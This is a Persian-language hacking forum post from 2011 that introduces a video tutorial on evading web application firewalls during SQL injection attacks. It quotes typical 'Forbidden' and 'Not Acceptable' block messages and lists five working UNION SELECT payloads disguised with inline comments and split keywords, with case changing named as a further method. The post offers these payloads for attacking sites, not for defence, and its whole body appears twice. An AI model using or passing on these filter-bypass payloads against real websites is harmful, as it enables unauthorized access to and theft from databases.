manixXxier
09-06-2011, 11:04 AM
با سلام و عرض خسته نباشید:
در بسیاری از حملان تزریق به دیتابیس فایروال های تحت وب با عث عدم تزریق دستورات میشند که معمولا چنین ارور هایی رو برای ما به نمایش در میارن:
Forbidden
You don't have permission to access /[].php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Not Acceptable
An appropriate representation of the requested resource /[].php could not be found on this server.
correspond
که برای بایپس کردن این گونه ارور ها می تونید از روش های مختلفی نظیر inline comment یا case changing و... استفاده کنید , البته در بعضی موارد اگر خود فایروال به آسیب پذیری corresponding الوده باشه می تونید دستورات رو با دست باز تری مثله :
1:id=1/*union*/union/*select*/select+1,2,3/*
2:id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
3:id=1+un/**/ion+sel/**/ect+1,2,3--
4:id=1/**/union/*&id=*/select/
5:id=1/**/union/*,*/select/*,*/
.
.
.
وارد کنید ( که البته در آینده از این نوع رو هم فیلم می کنم)
و بالاخره موضوع فیلم:
1: Case changing
2:Inline Comments
================================================== ===
اولین فیلمی هست که میسازم به بزرگیتون ببخشید و لطفا فقط فیلم رو با ابزار camplay که داخل فایل هست ببینید تا کیفیت خوبی داشته باشه.
پسورد: ashiyane.org
فایل رو نتونستم پیوست کنم از [Only registered and activated users can see links] استفاده کنید.
[Only registered and activated users can see links]
در بسیاری از حملان تزریق به دیتابیس فایروال های تحت وب با عث عدم تزریق دستورات میشند که معمولا چنین ارور هایی رو برای ما به نمایش در میارن:
Forbidden
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Not Acceptable
An appropriate representation of the requested resource /[].php could not be found on this server.
correspond
که برای بایپس کردن این گونه ارور ها می تونید از روش های مختلفی نظیر inline comment یا case changing و... استفاده کنید , البته در بعضی موارد اگر خود فایروال به آسیب پذیری corresponding الوده باشه می تونید دستورات رو با دست باز تری مثله :
1:id=1/*union*/union/*select*/select+1,2,3/*
2:id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
3:id=1+un/**/ion+sel/**/ect+1,2,3--
4:id=1/**/union/*&id=*/select/
5:id=1/**/union/*,*/select/*,*/
.
.
.
وارد کنید ( که البته در آینده از این نوع رو هم فیلم می کنم)
و بالاخره موضوع فیلم:
1: Case changing
2:Inline Comments
اولین فیلمی هست که میسازم به بزرگیتون ببخشید و لطفا فقط فیلم رو با ابزار camplay که داخل فایل هست ببینید تا کیفیت خوبی داشته باشه.
پسورد: ashiyane.org
فایل رو نتونستم پیوست کنم از [Only registered and activated users can see links] استفاده کنید.
[Only registered and activated users can see links]